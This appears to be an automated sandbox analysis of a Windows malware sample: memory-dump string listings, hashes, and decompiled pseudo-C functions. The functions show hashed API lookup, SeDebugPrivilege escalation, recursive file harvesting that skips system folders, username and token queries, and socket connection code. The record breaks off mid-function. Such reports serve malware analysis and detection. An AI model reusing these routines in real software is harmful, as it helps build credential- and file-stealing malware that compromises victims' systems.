                      • API ID:
                      • String ID: rdO2
                      • API String ID: 0-278582973
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: rdO2
                      • API String ID: 0-278582973
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: 6F!e
                      • API String ID: 0-827590951
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: 6F!e
                      • API String ID: 0-827590951
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: (~pg
                      • API String ID: 0-3863253146
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.648223462.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
                      • Associated: 00000000.00000002.648217225.00000000008F0000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmp
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.648223462.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
                      • Associated: 00000000.00000002.648217225.00000000008F0000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmp
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 34d90e007110da6eb4b57d5a82b9727d9b4adc83ce05a3b3fe8d7263909875ce
                      • Instruction ID: 57521fb4d3c49baf86d3bd5bf0a7b48801b70a6f664ff4d2316780edbe79037b
                      • Opcode Fuzzy Hash: 34d90e007110da6eb4b57d5a82b9727d9b4adc83ce05a3b3fe8d7263909875ce
                      • Instruction Fuzzy Hash: D1A16132E00619CFCF05DFA5C8845DDBBB2FF85304B1585AAE915BB225EB31A955CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f9fbca0daa5921d878955ae14716514dca844a3064fbd33b7f14a49d06dfa17
                      • Instruction ID: 3d1211d030284f28b3d2a59cfd7abe627cf1f93ee43a9edbad631078fcee2e8a
                      • Opcode Fuzzy Hash: 4f9fbca0daa5921d878955ae14716514dca844a3064fbd33b7f14a49d06dfa17
                      • Instruction Fuzzy Hash: C091E5B6E15209DFCB04CFE5D5814AEFBB6AF89300F10942AD415BB315DB389A42CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8cdc159ede53c67a8298ef76e981cb7034da2154bce07162a51a5b43b0938e23
                      • Instruction ID: 6bda89c89516768fdb111c59b178dfb8c1317adc7f975e6895f6b952bd1a8e06
                      • Opcode Fuzzy Hash: 8cdc159ede53c67a8298ef76e981cb7034da2154bce07162a51a5b43b0938e23
                      • Instruction Fuzzy Hash: 1F91E4B6E15209DFCB04CFA5D5814AEBBF2BF89300F20942AD415BB315DB389A42CF95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a0950bb715ec4b064a1a81f7f00fcb21fd60bf2389860fa2812db8708da127a0
                      • Instruction ID: 75122d6843c97a172bcab046f602bee44078d293f44adee04e2d085bfffb5025
                      • Opcode Fuzzy Hash: a0950bb715ec4b064a1a81f7f00fcb21fd60bf2389860fa2812db8708da127a0
                      • Instruction Fuzzy Hash: 6B5168B5E052498FDF08CFA9C445AEEFBF2AF89310F14C425D414AB314D7789A418FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 544258ba600ee852562c6b22ec35996ba31abfc5baafd164816af2b8c47f9828
                      • Instruction ID: e90784673165be65d2c13a813121f1911b93285e7634a278bf30cb3709d3243a
                      • Opcode Fuzzy Hash: 544258ba600ee852562c6b22ec35996ba31abfc5baafd164816af2b8c47f9828
                      • Instruction Fuzzy Hash: C8516AB5E0524A8FDF08CFA9D545AEEFBF2AF89310F14C42AD414AB314D77899418FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 614730510cec0fd45413c55f46512d41b1980f10e14122b29da876247a703b4d
                      • Instruction ID: 71029e749d0518f0458eeabd901d6026361157e2bff1c3fd1d7c947a2bf55f32
                      • Opcode Fuzzy Hash: 614730510cec0fd45413c55f46512d41b1980f10e14122b29da876247a703b4d
                      • Instruction Fuzzy Hash: 27415AB6E1521EDFCB04CFA6C5445AEFBB6FF88200F10982AD411B7254E7785A41CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2717c11312309b300b26ab610b0adc2b6c5db66ada139b5cebcfe497d88c4572
                      • Instruction ID: a76c82c69c70927fb5379850a0fb94ece38f6c47b4414ce8e22143870b6f2abd
                      • Opcode Fuzzy Hash: 2717c11312309b300b26ab610b0adc2b6c5db66ada139b5cebcfe497d88c4572
                      • Instruction Fuzzy Hash: 314179B6E1521EDFCB04CFA5C5446AEBBB2FF88200F10982AD411B7254E7785A41CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 64d13b5ecded08343ea6f6c484f449f16b314ddd209df04a51b611eb518b778c
                      • Instruction ID: dc7ec22fcb3349719bc966801853c677f20c7c103fa06921bd6b035f058c2aa2
                      • Opcode Fuzzy Hash: 64d13b5ecded08343ea6f6c484f449f16b314ddd209df04a51b611eb518b778c
                      • Instruction Fuzzy Hash: CA4108B1E0560ADBCB08DFA9C5809EEFBF6AF89300F25C06AC415B7214D7349A41CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f027e6aef5eeb8115e9a4b35fcdd259fa06b41db36cd6d4c1a6bf089ef719126
                      • Instruction ID: 3c44ead865f979b37e1c2a56aa0bbf098b4e552109fe9aa7332213285bd17822
                      • Opcode Fuzzy Hash: f027e6aef5eeb8115e9a4b35fcdd259fa06b41db36cd6d4c1a6bf089ef719126
                      • Instruction Fuzzy Hash: F741FAB2E0420A9BCB44CFAAC5815AEFBF6BF88300F14D469C455A7254D7389A41CF55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6a9b112340afb9cd99d3df9af8b97fb33c57d2291f2d2bd2397a72da47bf8495
                      • Instruction ID: db3bea660175104ddab5d61daadd70b59f52860048d0b0a1e9a3a5baac99af94
                      • Opcode Fuzzy Hash: 6a9b112340afb9cd99d3df9af8b97fb33c57d2291f2d2bd2397a72da47bf8495
                      • Instruction Fuzzy Hash: C1414BB2E0460A9FCB44CFA9C5419AEFBF2FF99304F24C56AC415A7254D3389A41CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d4851bc55edbed5223f5ec8f8e29af85130e67993d8b7b4b502ae2ca1ea623dd
                      • Instruction ID: 0758ddcb29a451ce9e9fb72e8373ec1eecce74832daf759fc9e99f043a2bfc91
                      • Opcode Fuzzy Hash: d4851bc55edbed5223f5ec8f8e29af85130e67993d8b7b4b502ae2ca1ea623dd
                      • Instruction Fuzzy Hash: E0413BB2E0564ADBDB04CFA5C5819EEFBF2AF89300F24C16AC415B7214D7349A41CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 07c60319add16dd43c01d2ad4bee62b1e89a2bb2049c80f5da4161bde482e540
                      • Instruction ID: 26735167c4d2d02b027471070120af069f8f3ea61148bc1e337bf666844d782a
                      • Opcode Fuzzy Hash: 07c60319add16dd43c01d2ad4bee62b1e89a2bb2049c80f5da4161bde482e540
                      • Instruction Fuzzy Hash: E821C1F2D093599FDB49CF7ACC4129EBBF3AFC9200F18C56AD444E7295DA3449018B12
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b0dd34c8272f7e93b6df177b1de5562dba275cb39890fb7649f45f9a6372bae1
                      • Instruction ID: e6712191164fe641b2df1cd7426641eaeedfd1f390049204b14790dd1440d80f
                      • Opcode Fuzzy Hash: b0dd34c8272f7e93b6df177b1de5562dba275cb39890fb7649f45f9a6372bae1
                      • Instruction Fuzzy Hash: 341159B1E152199BDB48CFAAD9406AEFBF7EBC9210F14C03AD408A7254DB345A058B51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Executed Functions

                      C-Code - Quality: 85%
                      			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                      				struct _WIN32_FIND_DATAW _v596;
                      				void* __ebx;
                      				void* _t35;
                      				int _t43;
                      				void* _t52;
                      				int _t56;
                      				intOrPtr _t60;
                      				void* _t66;
                      				void* _t73;
                      				void* _t74;
                      				WCHAR* _t98;
                      				void* _t99;
                      				void* _t100;
                      				void* _t101;
                      				WCHAR* _t102;
                      				void* _t103;
                      				void* _t104;
                      
                      				L004067C4(0xa); // executed
                      				_t72 = 0;
                      				_t100 = 0x2e;
                      				_t106 = _a16;
                      				if(_a16 == 0) {
                      					L15:
                      					_push(_a8);
                      					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                      					_t104 = _t103 + 0xc;
                      					if(_t98 == 0) {
                      						L30:
                      						__eflags = 0;
                      						return 0;
                      					}
                      					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                      					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                      					_t73 = _t35;
                      					if(_t73 == 0xffffffff) {
                      						L29:
                      						E00402BAB(_t98);
                      						goto L30;
                      					}
                      					L17:
                      					while(1) {
                      						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                      							if(_v596.dwFileAttributes != 0x10) {
                      								L21:
                      								_push( &(_v596.cFileName));
                      								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                      								_t104 = _t104 + 0xc;
                      								if(_t101 == 0) {
                      									goto L24;
                      								}
                      								if(_a12 == 0) {
                      									E00402BAB(_t98);
                      									E00403BEF(_t73);
                      									return _t101;
                      								}
                      								_a12(_t101);
                      								E00402BAB(_t101);
                      								goto L24;
                      							}
                      							_t124 = _a20;
                      							if(_a20 == 0) {
                      								goto L24;
                      							}
                      							goto L21;
                      						} else {
                      							L24:
                      							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                      							_t43 = FindNextFileW(_t73,  &_v596); // executed
                      							if(_t43 == 0) {
                      								E00403BEF(_t73); // executed
                      								goto L29;
                      							}
                      							_t100 = 0x2e;
                      							continue;
                      						}
                      					}
                      				}
                      				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                      				if(_t102 == 0) {
                      					L14:
                      					_t100 = 0x2e;
                      					goto L15;
                      				}
                      				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                      				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                      				_t74 = _t52;
                      				if(_t74 == 0xffffffff) {
                      					L13:
                      					E00402BAB(_t102);
                      					_t72 = 0;
                      					goto L14;
                      				} else {
                      					goto L3;
                      				}
                      				do {
                      					L3:
                      					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                      						goto L11;
                      					}
                      					if(_a24 == 0) {
                      						L7:
                      						if(E00405D24( &(_v596.cFileName)) >= 3) {
                      							L9:
                      							_push( &(_v596.cFileName));
                      							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                      							_t103 = _t103 + 0xc;
                      							_a16 = _t60;
                      							_t115 = _t60;
                      							if(_t60 == 0) {
                      								goto L11;
                      							}
                      							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                      							E00402BAB(_a16);
                      							_t103 = _t103 + 0x1c;
                      							if(_t99 != 0) {
                      								E00402BAB(_t102);
                      								E00403BEF(_t74);
                      								return _t99;
                      							}
                      							goto L11;
                      						}
                      						_t66 = 0x2e;
                      						_t114 = _v596.cFileName - _t66;
                      						if(_v596.cFileName == _t66) {
                      							goto L11;
                      						}
                      						goto L9;
                      					}
                      					_push(L"Windows");
                      					if(E00405EFF( &(_v596.cFileName)) != 0) {
                      						goto L11;
                      					}
                      					_push(L"Program Files");
                      					if(E00405EFF( &(_v596.cFileName)) != 0) {
                      						goto L11;
                      					}
                      					goto L7;
                      					L11:
                      					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                      					_t56 = FindNextFileW(_t74,  &_v596); // executed
                      				} while (_t56 != 0);
                      				E00403BEF(_t74); // executed
                      				goto L13;
                      			}

                      APIs
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID: %s\%s$%s\*$Program Files$Windows
                      • API String ID: 1690352074-2009209621
                      • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                      • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                      				void* _v8;
                      				struct _LUID _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				struct _TOKEN_PRIVILEGES _v32;
                      				intOrPtr* _t13;
                      				void* _t14;
                      				int _t16;
                      				int _t31;
                      				void* _t32;
                      
                      				_t31 = 0;
                      				E004060AC();
                      				_t32 = __eax;
                      				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                      				_t14 =  *_t13(_t32, 0x28,  &_v8);
                      				if(_t14 != 0) {
                      					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                      					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                      					if(_t16 != 0) {
                      						_push(__ebx);
                      						_v32.Privileges = _v16.LowPart;
                      						_v32.PrivilegeCount = 1;
                      						_v24 = _v16.HighPart;
                      						_v20 = 2;
                      						E004031E5(1, 9, 0xc1642df2, 0, 0);
                      						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                      						_t31 =  !=  ? 1 : 0;
                      					}
                      					E00403C40(_v8);
                      					return _t31;
                      				}
                      				return _t14;
                      			}

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                      • String ID: SeDebugPrivilege
                      • API String ID: 3615134276-2896544425
                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402B7C(long _a4) {
                      				void* _t4;
                      				void* _t7;
                      
                      				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                      				_t7 = _t4;
                      				if(_t7 != 0) {
                      					E00402B4E(_t7, 0, _a4);
                      				}
                      				return _t7;
                      			}

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcess
                      • String ID:
                      • API String ID: 1357844191-0
                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406069(WCHAR* _a4, DWORD* _a8) {
                      				int _t4;
                      				void* _t5;
                      
                      				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                      				_t4 = GetUserNameW(_a4, _a8); // executed
                      				return _t4;
                      			}

                      APIs
                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: recv
                      • String ID:
                      • API String ID: 1507349165-0
                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                      				int _v8;
                      				long _v12;
                      				int _v16;
                      				int _v20;
                      				char _v24;
                      				char _v28;
                      				char _v32;
                      				intOrPtr* _t25;
                      				int _t27;
                      				int _t30;
                      				int _t31;
                      				int _t36;
                      				int _t37;
                      				intOrPtr* _t39;
                      				int _t40;
                      				long _t44;
                      				intOrPtr* _t45;
                      				int _t46;
                      				void* _t48;
                      				int _t49;
                      				void* _t67;
                      				void* _t68;
                      				void* _t74;
                      
                      				_t48 = __ebx;
                      				_t67 = 0;
                      				_v8 = 0;
                      				E00402BF2();
                      				_t68 = __eax;
                      				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                      				_t2 =  &_v8; // 0x414449
                      				_push(1);
                      				_push(8);
                      				_push(_t68);
                      				if( *_t25() != 0) {
                      					L4:
                      					_t27 = E00402B7C(0x208);
                      					_v20 = _t27;
                      					__eflags = _t27;
                      					if(_t27 != 0) {
                      						E0040338C(_t27, _t67, 0x104);
                      						_t74 = _t74 + 0xc;
                      					}
                      					_push(_t48);
                      					_t49 = E00402B7C(0x208);
                      					__eflags = _t49;
                      					if(_t49 != 0) {
                      						E0040338C(_t49, _t67, 0x104);
                      						_t74 = _t74 + 0xc;
                      					}
                      					_v28 = 0x208;
                      					_v24 = 0x208;
                      					_t7 =  &_v8; // 0x414449
                      					_v12 = _t67;
                      					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                      					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                      					__eflags = _t30;
                      					if(_t30 == 0) {
                      						_t36 = E00402B7C(_v12);
                      						_v16 = _t36;
                      						__eflags = _t36;
                      						if(_t36 != 0) {
                      							_t14 =  &_v8; // 0x414449, executed
                      							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                      							__eflags = _t37;
                      							if(_t37 != 0) {
                      								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                      								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                      								__eflags = _t40;
                      								if(__eflags != 0) {
                      									_t67 = E00405B6F(__eflags, L"%s", _t49);
                      								}
                      							}
                      							E00402BAB(_v16);
                      						}
                      					}
                      					__eflags = _v8;
                      					if(_v8 != 0) {
                      						E00403C40(_v8); // executed
                      					}
                      					__eflags = _t49;
                      					if(_t49 != 0) {
                      						E00402BAB(_t49);
                      					}
                      					_t31 = _v20;
                      					__eflags = _t31;
                      					if(_t31 != 0) {
                      						E00402BAB(_t31);
                      					}
                      					return _t67;
                      				}
                      				_t44 = GetLastError();
                      				if(_t44 == 0x3f0) {
                      					E004060AC();
                      					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                      					_t3 =  &_v8; // 0x414449
                      					_t46 =  *_t45(_t44, 8, _t3);
                      					__eflags = _t46;
                      					if(_t46 == 0) {
                      						goto L2;
                      					}
                      					goto L4;
                      				}
                      				L2:
                      				return 0;
                      			}

                      APIs
                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                      • _wmemset.LIBCMT ref: 00406244
                      • _wmemset.LIBCMT ref: 00406261
                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: _wmemset$ErrorInformationLastToken
                      • String ID: IDA$IDA
                      • API String ID: 487585393-2020647798
                      • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                      • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 37%
                      			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                      				signed int _v8;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				void _v40;
                      				void* _t23;
                      				signed int _t24;
                      				signed int* _t25;
                      				signed int _t30;
                      				signed int _t31;
                      				signed int _t33;
                      				signed int _t41;
                      				void* _t42;
                      				signed int* _t43;
                      
                      				_v8 = _v8 & 0x00000000;
                      				_t33 = 8;
                      				memset( &_v40, 0, _t33 << 2);
                      				_v32 = 1;
                      				_t23 =  &_v40;
                      				_v28 = 6;
                      				_v36 = 2;
                      				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                      				if(_t23 == 0) {
                      					_t24 = E00402B7C(4);
                      					_t43 = _t24;
                      					_t31 = _t30 | 0xffffffff;
                      					 *_t43 = _t31;
                      					_t41 = _v8;
                      					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                      					 *_t43 = _t24;
                      					if(_t24 != _t31) {
                      						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                      						if(_t24 == _t31) {
                      							E00404DE5(_t24,  *_t43);
                      							 *_t43 = _t31;
                      						}
                      						__imp__freeaddrinfo(_v8);
                      						if( *_t43 != _t31) {
                      							_t25 = _t43;
                      							goto L10;
                      						} else {
                      							E00402BAB(_t43);
                      							L8:
                      							_t25 = 0;
                      							L10:
                      							return _t25;
                      						}
                      					}
                      					E00402BAB(_t43);
                      					__imp__freeaddrinfo(_v8);
                      					goto L8;
                      				}
                      				return 0;
                      			}

                      APIs
                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                      • socket.WS2_32(?,?,?), ref: 00404E7A
                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: freeaddrinfogetaddrinfosocket
                      • String ID:
                      • API String ID: 2479546573-0
                      • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                      • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 74%
                      			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
